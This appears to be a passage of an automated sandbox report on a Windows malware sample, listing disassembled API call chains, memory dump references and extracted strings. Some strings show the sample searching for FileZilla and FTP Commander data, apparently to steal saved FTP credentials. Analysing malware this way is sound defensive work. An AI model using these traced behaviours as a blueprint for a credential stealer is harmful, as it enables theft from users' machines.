                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00409F5B
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00409F5F
                                                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                                                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00409F80
                                                                                                                                                                                                  • Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CountMessageTick$DispatchPeekSleep
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4159783438-0
                                                                                                                                                                                                  • Opcode ID: ab27e8fd20f0983608bc295b19996ec13099b56f87bcdccced181fb1a6008d05
                                                                                                                                                                                                  • Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab27e8fd20f0983608bc295b19996ec13099b56f87bcdccced181fb1a6008d05
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                                                                                                                                                                                                    • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                                                                                                                                                                                                    • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
                                                                                                                                                                                                    • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
                                                                                                                                                                                                    • Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                                                                                                                                                                                                    • Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
                                                                                                                                                                                                    • Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                                                                                                                                                                                                  • CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0040875A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
                                                                                                                                                                                                  • String ID: http://$+@
                                                                                                                                                                                                  • API String ID: 147727044-3628382792
                                                                                                                                                                                                  • Opcode ID: 6e9e626a4613c0855f5347982540e942ed1617b6e834c0e4f94aa1f1be06abb5
                                                                                                                                                                                                  • Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e9e626a4613c0855f5347982540e942ed1617b6e834c0e4f94aa1f1be06abb5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20
                                                                                                                                                                                                    • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                                                                                                                                                                                                    • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CreateModuleNamePointerWrite
                                                                                                                                                                                                  • String ID: UniqueNum$x
                                                                                                                                                                                                  • API String ID: 594998759-2399716736
                                                                                                                                                                                                  • Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                                                                                                                                                                                                  • Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A
                                                                                                                                                                                                    • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                                                                                                                                                                                                    • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                                                                                                                                                                                                    • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                                                                                                                                                                                                    • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                                                                                                                                                                                                    • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                                                                                                                                                                                                    • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                                                                                                                                                                                                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                                                                                                                                                                                                  • String ID: #$&$*filezilla*
                                                                                                                                                                                                  • API String ID: 3438805939-758400021
                                                                                                                                                                                                  • Opcode ID: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                                                                                                                                                                                                  • Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5
                                                                                                                                                                                                    • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                                                                                                                                                                                                    • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                                                                                                                                                                                                    • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                                                                                                                                                                                                    • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                                                                                                                                                                                                    • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                                                                                                                                                                                                    • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                                                                                                                                                                                                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                                                                                                                                                                                                  • String ID: #$&$ftp*commander*
                                                                                                                                                                                                  • API String ID: 3438805939-1149875651
                                                                                                                                                                                                  • Opcode ID: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                                                                                                                                                                                                  • Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004094A9
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004094AE
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                                                  • String ID: _blank$an.yandex.ru/count
                                                                                                                                                                                                  • API String ID: 3341692771-25359924
                                                                                                                                                                                                  • Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                                                                                                                                                                                                  • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                                  • String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
                                                                                                                                                                                                  • API String ID: 71445658-3061378640
                                                                                                                                                                                                  • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                                                                                                                                                                                                  • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                                                                                                                                                                                                    • Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
                                                                                                                                                                                                    • Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484
                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3604167287-0
                                                                                                                                                                                                  • Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                                                                                                                                                                                                  • Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
                                                                                                                                                                                                  • CharLowerW.USER32(00408795), ref: 004095D8
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00408795), ref: 00409608
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00408E44), ref: 0040960D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CharFreeLowerString
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2335467167-0
                                                                                                                                                                                                  • Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                                                                                                                                                                                                  • Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                  • String ID: -
                                                                                                                                                                                                  • API String ID: 885266447-2547889144
                                                                                                                                                                                                  • Opcode ID: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                                                                                                                                                                                                  • Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00409868
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00409876
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocString
                                                                                                                                                                                                  • String ID: "URL"
                                                                                                                                                                                                  • API String ID: 2525500382-1734660058
                                                                                                                                                                                                  • Opcode ID: dde5973fb88290fc179560dd033cd143229de4e8b937af87662ad62248fcd5ae
                                                                                                                                                                                                  • Instruction ID: a1d8355846c3e17605cb56d648b2f311708773d78851072204e2f77cd01d539a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dde5973fb88290fc179560dd033cd143229de4e8b937af87662ad62248fcd5ae
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9F0A77650011997CF00AF64CC00ED637E9BB84348F0444B7E904E7240D974D9058F54
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 004097ED
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 004097FB
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocString
                                                                                                                                                                                                  • String ID: "domain"
                                                                                                                                                                                                  • API String ID: 2525500382-3540696003
                                                                                                                                                                                                  • Opcode ID: 8e4162beac9bb0746109323da30f0d67e223eba2bd2c583220c59dcd4726db76
                                                                                                                                                                                                  • Instruction ID: 2ab7b57618223888890007651f958d72a6f850cfddda49e7e7e9e9b765f43e97
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e4162beac9bb0746109323da30f0d67e223eba2bd2c583220c59dcd4726db76
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AEF0A776500119ABCF00AF64CC04ED677E8BB84308F1444A7F908E7240EA7499058F50